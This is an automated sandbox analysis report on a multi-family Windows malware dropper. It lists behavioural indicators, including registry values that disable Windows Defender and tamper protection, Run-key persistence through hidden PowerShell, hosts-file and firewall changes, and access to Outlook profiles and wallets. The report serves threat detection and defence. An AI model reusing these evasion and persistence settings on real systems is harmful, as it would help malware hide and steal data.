Malware Analysis Report

2025-06-16 01:30

Sample ID 231031-d1ybksad24
Target 93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652
SHA256 93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652
Tags
amadey dcrat glupteba raccoon redline sectoprat smokeloader xmrig zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652

Threat Level: Known bad

The file 93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline sectoprat smokeloader xmrig zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx

Suspicious use of NtCreateUserProcessOtherParentProcess

DcRat

Glupteba

Raccoon

Modifies Windows Defender Real-time Protection settings

Amadey

SectopRAT payload

RedLine

Raccoon Stealer payload

RedLine payload

Glupteba payload

SmokeLoader

xmrig

ZGRat

SectopRAT

Detect ZGRat V1

XMRig Miner payload

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

UPX packed file

Executes dropped EXE

Windows security modification

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Detected potential entity reuse from brand paypal.

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Modifies data under HKEY_USERS

outlook_office_path

Creates scheduled task(s)

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 03:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 03:29

Reported

2023-10-31 03:31

Platform

win10v2004-20231025-en

Max time kernel

91s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FF0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\43B6.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Br8CM55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DD6F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DE2C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Av10fD7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E0DD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2dU814HH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E63F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FF0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\131E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2FAF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3696.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\43B6.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\43B6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\43B6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\43B6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\43B6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\43B6.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\DD6F.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\131E.exe'\"" C:\Users\Admin\AppData\Local\Temp\131E.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\conhost.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-URUE2.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-527VN.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-DBO86.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-FSJI8.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-Q00HP.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-9FPTS.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-HPHBQ.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\KAudioConverter\is-9LLN4.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-CUNJ2.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-A5AMJ.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-NPM2A.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-KAIN5.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-J5150.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-NJEVF.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-IGKC3.tmp C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\conhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
